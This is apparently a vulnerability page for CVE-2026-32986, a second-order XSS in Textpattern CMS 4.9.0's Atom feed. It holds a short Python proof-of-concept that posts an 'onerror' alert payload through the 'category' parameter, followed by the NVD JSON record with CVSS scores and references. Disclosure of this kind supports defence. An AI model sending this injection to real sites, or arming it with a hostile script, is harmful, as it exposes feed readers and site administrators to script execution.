CVE-2026-32986

import requests # Target URL configuration target_url = "http://target-textpattern-site/index.php" # Malicious payload to be injected into the Atom feed # The payload targets the 'category' parameter which is reflected in XML fieldspayload = { "category": "<img src=x onerror=alert('CVE-2026-32986')>", "title": "Test Article", "body": "Content goes here" } # Step 1: Inject the payload # This simulates a request that creates an entry or updates a category try: response = requests.post(target_url + "?event=article", data=payload) if response.status_code == 200: print("Payload injected successfully.") else: print(f"Injection failed with status code: {response.status_code}") except Exception as e: print(f"Error during injection: {e}") # Step 2: Verify by checking the Atom feed # An attacker or admin would access the feed to trigger the XSS in a vulnerable reader feed_url = target_url + "?feed=atom" print(f"Check the feed at: {feed_url}") print("If the feed reader parses this using innerHTML, the alert will trigger.")

{"cve": {"id": "CVE-2026-32986", "sourceIdentifier": "[email protected]", "published": "2026-03-20T16:16:17.573", "lastModified": "2026-04-16T14:44:02.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Textpattern CMS version 4.9.0 contains a second-order cross-site scripting vulnerability that allows attackers to inject malicious scripts by exploiting improper sanitization of user-supplied input in Atom feed XML elements. Attackers can embed unescaped payloads in parameters such as category that are reflected into Atom fields like and , which execute as JavaScript when feed readers or CMS aggregators consume the feed and insert content into the DOM using unsafe methods."}, {"lang": "es", "value": "La versión 4.9.0 de Textpattern CMS contiene una vulnerabilidad de cross-site scripting de segundo orden que permite a los atacantes inyectar scripts maliciosos al explotar una sanitización inadecuada de la entrada proporcionada por el usuario en elementos XML de feeds Atom. Los atacantes pueden incrustar cargas útiles sin escapar en parámetros como category que se reflejan en campos Atom como y , que se ejecutan como JavaScript cuando los lectores de feeds o los agregadores de CMS consumen el feed e insertan contenido en el DOM utilizando métodos inseguros."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-116"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:textpattern:textpattern:4.9.0:-:*:*:*:*:*:*", "matchCriteriaId": "E401C6DA-6708-4F7E-B6F6-54718AF3A18E"}]}]}], "references": [{"url": "https://packetstorm.news/files/id/216241/", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://textpattern.com/", "source": "[email protected]", "tags": ["Product"]}]}}